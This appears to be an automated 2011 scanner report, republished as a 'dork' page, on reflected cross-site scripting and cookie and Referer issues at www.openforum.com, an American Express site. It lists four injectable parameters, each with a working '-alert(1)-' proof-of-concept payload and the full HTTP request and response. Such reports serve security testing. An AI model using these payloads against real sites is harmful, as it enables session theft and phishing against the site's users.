XSS, Cross Site Scripting, www.openforum.com, CAPEC-86, CWE-79

XSS in www.openforum.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:03:04 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

1.2. https://www.openforum.com/ [cid parameter]

1.3. https://www.openforum.com/ [inav parameter]

1.4. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

2. SSL cookie without secure flag set

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. http://www.openforum.com/

4.2. https://www.openforum.com/

4.3. https://www.openforum.com/

5. Cookie without HttpOnly flag set

5.1. http://www.openforum.com/

5.2. https://www.openforum.com/

6. Email addresses disclosed



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/
Content-Length: 102188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f54350'-alert(1)-'b64566be317%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?54350'-alert(1)-'b64566be317%3d1';
   /*]]>
...[SNIP]...

1.2. https://www.openforum.com/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/
Content-Length: 102363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
ink = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_homea4b2f'-alert(1)-'731207dc1c%2526inav%253dmenu_business_openforum';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_homea4b2f'-alert(1)-'731207dc1c%26inav%3dmenu_business_openforum';
   /*]]>
...[SNIP]...

1.3. https://www.openforum.com/ [inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 102377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_home%26inav%3dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
   /*]]>
...[SNIP]...

1.4. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/
Content-Length: 102556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fa374f'-alert(1)-'7289baab9b9%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?a374f'-alert(1)-'7289baab9b9%3d1';
   /*]]>
...[SNIP]...

2. SSL cookie without secure flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/
Content-Length: 102267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/
Content-Length: 102267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link media="all" type="text/css" href="https://secure.americanexpress.com/NextGenNavigation/css/inav_ngi_nested.css" rel="stylesheet" /><!--[if lt IE 7]>
...[SNIP]...
<div id="iNavLogo">
<a accesskey="0" title="" href="https://home.americanexpress.com/home/mt_personal.shtml" id=""><img src="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif" title="American Express US: homepage" alt="American Express Logo - link to home" class="amexLogo" /></a>
...[SNIP]...
<li>
<a href="https://online.americanexpress.com/myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&us_nu=logincontrol&inav=menu_acct_summary" title="" id="iNav_MyAccount" accesskey="1"><span class="iNavT1LtDoor">
...[SNIP]...
<li>
<a title="" href="https://online.americanexpress.com/myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&us_nu=logincontrol&inav=menu_myacct_acctsum" id="menu_myacct_acctsum">Account Summary</a>
...[SNIP]...
<li>
<a title="" href="https://www295.americanexpress.com/cards/home.do?inav=menu_myacct_cardbenefits" id="menu_myacct_cardbenefits">My Card Benefits</a>
...[SNIP]...
<li>
<a title="" href="https://online.americanexpress.com/myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&us_nu=logincontrol&inav=menu_myacct_smallbusiness" id="menu_myacct_smallbusiness">OPEN Small Business</a>
...[SNIP]...
<li>
<a title="" href="https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do?ssolang=en_US&ssobrand=SOMSET&dispute=N&inav=menu_myacct_merchantacct" id="menu_myacct_merchantacct">Online Merchant Services</a>
...[SNIP]...
<li>
<a title="" href="https://www209.americanexpress.com/merchant/marketing-data/pages/home?inav=menu_myacct_merchantsolutions" id="menu_myacct_merchantsolutions">Merchant Toolkit</a>
...[SNIP]...
<li>
<a title="" href="https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm?request_type=authreg_mr&Face=en_US&inav=menu_myacct_mrpointsum" id="menu_myacct_mrpointsum">Membership Rewards&reg; Point Summary</a>
...[SNIP]...
<li>
<a title="" href="https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do?inav=menu_myacct_creditsecure" id="menu_myacct_creditsecure">CreditSecure</a>
...[SNIP]...
<li>
<a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a>
...[SNIP]...
<div class="iNavPZNImg"><img src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" title="Mobile Account Management" alt="Mobile Account Management" class="defOffer" /></div>
...[SNIP]...
<br /> <a href="https://www201.americanexpress.com/MobileWeb/index.jsp?intlink=selfservices_mobile" id="menu_xsell_gomobile" title="">Go Mobile</a>
...[SNIP]...
<li>
<a title="" href="https://www.americanexpress.com/gift/giftcardslanding.shtml?inav=menu_cards_giftcards" id="menu_cards_giftcards">Gift Cards</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do?vgnextoid=2e265b3a7fba9210VgnVCM100000defaad94RCRD&inav=menu_cards_reloadablecards" id="menu_cards_reloadablecards">Reloadable Cards</a>
...[SNIP]...
<li>
<a href="https://axptravel.americanexpress.com/consumertravel/travel.do?" title="" id="iNav_Travel"><span class="iNavT1LtDoor">
...[SNIP]...
<li>
<a title="" href="https://axptravel.americanexpress.com/consumertravel/travel.do?us_nu=subtab&inav=menu_travel_book" id="menu_travel_book">Book A Trip</a>
...[SNIP]...
<li>
<a title="" href="https://axptravel.americanexpress.com/consumertravel/travel.do?a=travel-offers&us_nu=subtab&inav=menu_travel_viewoffers" id="menu_travel_viewoffers">View Travel Offers</a>
...[SNIP]...
<li>
<a title="" href="https://axptravel.americanexpress.com/consumertravel/travel.do?a=travel-planning&us_nu=subtab&inav=menu_travel_exploreresources" id="menu_travel_exploreresources">Explore Planning &amp; Resources</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do?vgnextoid=988c78276da87210VgnVCM200000d0faad94RCRD&inav=menu_travel_open" id="menu_travel_open">OPEN Business Travel</a>
...[SNIP]...
<li>
<a title="" href="https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do?inav=menu_travel_protection" id="menu_travel_protection">Travel Protection </a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do?vgnextoid=6d17fc671492a110VgnVCM100000defaad94RCRD&inav=menu_travel_cheques" id="menu_travel_cheques">Travelers Cheques</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do?vgnextoid=24c615ab025ed010VgnVCM10000084b3ad94RCRD&vgnextchannel=3c830da9846dd010VgnVCM10000084b3ad94RCRD&name=globalassist_allccsg_shareddetails&type=intBenefitDetail&inav=menu_travel_globalassist" id="menu_travel_globalassist">Global Assist Hotline</a>
...[SNIP]...
<div class="iNavPZNImg"><img src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" title="Book a Trip" alt="Book a Trip" class="defOffer" /></div>
...[SNIP]...
<li>
<a href="https://www.americanexpress.com/membershiprewards" title="" id="iNav_Rewards"><span class="iNavT1LtDoor">
...[SNIP]...
<li>
<a title="" href="https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm?request_type=authreg_mr&Face=en_US&inav=menu_rewards_pointsummary" id="menu_rewards_pointsummary">Point Summary</a>
...[SNIP]...
<li>
<a title="" href="https://www295.americanexpress.com/cards/home.do?inav=ExploreYourCardsRewardsProgram" id="ExploreYourCardsRewardsProgram">Explore Your Cards Rewards Program</a>
...[SNIP]...
<li>
<a title="" href="https://www295.americanexpress.com/entertainmentaccess/home.do?inav=menu_rewards_entertainment" id="menu_rewards_entertainment">Entertainment and Events</a>
...[SNIP]...
<div class="iNavPZNImg"><img src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" title="DailyWish" alt="DailyWish" class="defOffer" /></div>
...[SNIP]...
<li>
<a title="" href="https://www257.americanexpress.com/openhome/smallbusiness.do?isFlash=true&inav=menu_business_openhome" id="menu_business_openhome">OPEN Small Business Home</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/int/fxip/fxinternationalpayments.do?vgnextoid=7d032027eaafc110VgnVCM200000d0faad94RCRD&inav=menu_business_corpfx" id="menu_business_corpfx">FX International Payments</a>
...[SNIP]...
<li>
<a title="" href="https://www209.americanexpress.com/merchant/marketing-data/pages/home?inav=menu_business_merchhome" id="menu_business_merchhome">Merchant Home</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do?vgnextoid=b79c41b80e452210VgnVCM200000d0faad94RCRD&inav=menu_business_merchaccounts" id="menu_business_merchaccounts">Manage Merchant Accounts</a>
...[SNIP]...
<li>
<a title="" href="https://www209.americanexpress.com/merchant/marketing-data/pages/reportsandtrends?inav=menu_business_merchspend" id="menu_business_merchspend">Spend Reports &amp; Trends</a>
...[SNIP]...
<li>
<a title="" href="https://www209.americanexpress.com/merchant/marketing-data/pages/marketingprograms?inav=menu_business_merchmarket" id="menu_business_merchmarket">Marketing &amp; Resources</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do?vgnextoid=72a5686c12612210VgnVCM100000defaad94RCRD&inav=menu_business_merchaccept" id="menu_business_merchaccept">Accept the Card</a>
...[SNIP]...
<div class="iNavPZNImg"><img src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" title="OPEN Forum" alt="OPEN Forum" class="defOffer" /></div>
...[SNIP]...
</span><a title="" href="https://home.americanexpress.com/home/global_splash.html?inav=iNavUtilChangeCountry" id="iNavUtilChangeCountry">(Change Country)</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/int/contactus/smallbusiness.do?vgnextoid=66397e7fb5bdc110VgnVCM100000defaad94RCRD&page=2&inav=iNavUtilContact" id="iNavUtilContact">Contact Us</a>
...[SNIP]...
</span><a title="" href="https://home.americanexpress.com/home/mt_personal.shtml?inav=iNavLnkLog" id="iNavLnkLog">Log In</a>
<noscript>
<a title="Log out from the account" href="https://online.americanexpress.com/myca/logon/us/action?request_type=LogLogoffHandler&Face=en_US&inav=Logout" id="Logout">LOG OUT</a>
...[SNIP]...
<li>
<a title="" href="https://online.americanexpress.com/myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&us_nu=subtab&inav=open_acctmngt2" id="open_acctmngt2" class="iNavFirstElement">Account Management</a>
...[SNIP]...
<li>
<a title="" href="https://online.americanexpress.com/myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&us_nu=dd&inav=open_summaccts" id="open_summaccts">Summary of Accounts</a>
...[SNIP]...
<li>
<a title="" href="https://online.americanexpress.com/myca/estmt/us/list.do?request_type=authreg_Statement&Face=en_US&BPIndex=1&sorted_index=0&inav=open_onlinestatement" id="open_onlinestatement">Online Statement</a>
...[SNIP]...
<li>
<a title="" href="https://www99.americanexpress.com/myca/onlinepayment/us/paymentcenter.do?request_type=authreg_PayBill&Details=true&Face=en_US&sorted_index=0&inav=open_paybill" id="open_paybill">Pay Card Bill</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/accountservices/aa_aam.do?vgnextoid=3be0ed9d41d75210VgnVCM200000d0faad94RCRD&inav=open_delegate" id="open_delegate">Delegate Account Management</a>
...[SNIP]...
<li>
<a title="" href="https://www201.americanexpress.com/en/cards?request_type=AddsuppMain&inav=open_employecards" id="open_employecards">Request Employee Cards</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/smartcreditguide/account_tools.do?vgnextoid=05d117a4ecdcf110VgnVCM200000d0faad94RCRD&inav=open_learnaboutacctmngt" id="open_learnaboutacctmngt">Learn about Account Management</a>
...[SNIP]...
<li>
<a title="" href="https://www.americanexpress.com/customerservice?inav=pen_acctpreferences" id="pen_acctpreferences">Manage Account Preferences</a>
...[SNIP]...
<li>
<a title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do?vgnextoid=988c78276da87210VgnVCM200000d0faad94RCRD&inav=open_biztravel" id="open_biztravel">Business Travel</a>
...[SNIP]...
<li>
<a title="" href="https://www257.americanexpress.com/openhome/maximizerewards.do?&inav=open_runfund&inav=open_mr" id="open_mr">Make Every Transaction Count</a>
...[SNIP]...
<li>
<a title="" href="https://www257.americanexpress.com/opensavings/opensavings.do?inav=open_opensavings" id="open_opensavings">OPEN Savings&reg; (Built-in Savings)</a>
...[SNIP]...
<li>
<a title="" href="https://www.americanexpress.com/gift/giftcardslanding.shtml?&inav=open_bizgiftcards" id="open_bizgiftcards">Business Gift Cards</a>
...[SNIP]...
<li>
<a title="" href="https://www295.americanexpress.com/fsea/travel/osbn/hub.do?inav=open_preminsurance" id="open_preminsurance">Premium Insurance &amp; Services</a>
...[SNIP]...
<li>
<a title="" href="https://www201.americanexpress.com/en/cards?request_type=AddsuppMain&inav=open_employeecards" id="open_employeecards">Request Employee Cards</a>
...[SNIP]...
<li>
<a title="" href="https://www201.americanexpress.com/eaol/statuscheck/welcome.jsp?intlink=opennav_dd&inav=Check Application Status" id="Check Application Status">Check Application Status</a>
...[SNIP]...
<li id="UtilityLogin"><a href="https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum">login</a>
...[SNIP]...
<p class="callout"><a class="btn_member_log_in" href="https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum">member log in</a>
...[SNIP]...
<noscript><link media="all" type="text/css" href="https://secure.americanexpress.com/NextGenNavigation/css/inav_ngi_nested.css" rel="stylesheet" /></noscript>
...[SNIP]...
<li>
<a id="footer_giftcards" title="" href="https://www.americanexpress.com/gift/giftcardslanding.shtml?inav=footer_giftcards">Gift Cards</a>
...[SNIP]...
<li>
<a id="footer_prem_services" title="" href="https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do?inav=footer_prem_services">Travel Protection</a>
...[SNIP]...
<li>
<a id="footer_booktravel" title="" href="https://axptravel.americanexpress.com/consumertravel/travel.do?inav=footer_booktravel">Book a Trip</a>
...[SNIP]...
<li>
<a id="footer_airline_credit_cards" title="" href="https://www.americanexpress.com/airlines-credit-card/?inav=footer_airline_credit_cards">Airlines Credit Cards</a>
...[SNIP]...
<li>
<a id="footer_credit_card_rewards" title="" href="https://www.americanexpress.com/credit-card-rewards/?inav=footer_credit_card_rewards">Credit Card Rewards</a>
...[SNIP]...
<li>
<a id="footer_noannual_credit_cards" title="" href="https://www.americanexpress.com/no-annual-fee-credit-cards/?inav=footer_noannual_credit_cards">No Annual Fee Credit Cards</a>
...[SNIP]...
<li>
<a id="footer_gold_card" title="" href="https://www.americanexpress.com/gold-card/?inav=footer_gold_card">Gold Cards</a>
...[SNIP]...
<li>
<a id="footer_fraud_protection_center" title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do?vgnextoid=2621c0f7c5a4c110VgnVCM100000defaad94RCRD&inav=footer_fraud_protection_center">Fraud Protection Center</a>
...[SNIP]...
<li>
<a id="footer_mobile" title="" href="https://www201.americanexpress.com/MobileWeb/index.jsp?inav=footer_mobile">Mobile Services and Apps</a>
...[SNIP]...
<li>
<a id="footer_affiliates" title="" href="https://www.americanexpress.com/affiliate?inav=footer_affiliates">Affiliate Program</a>
...[SNIP]...
<li>
<a id="footer_contact_us" title="" href="https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalcards.do?vgnextoid=c3d6c697b3bdc110VgnVCM100000defaad94RCRD&page=1&source=footer_contact_us&inav=footer_contact_us">Contact Us</a>
...[SNIP]...
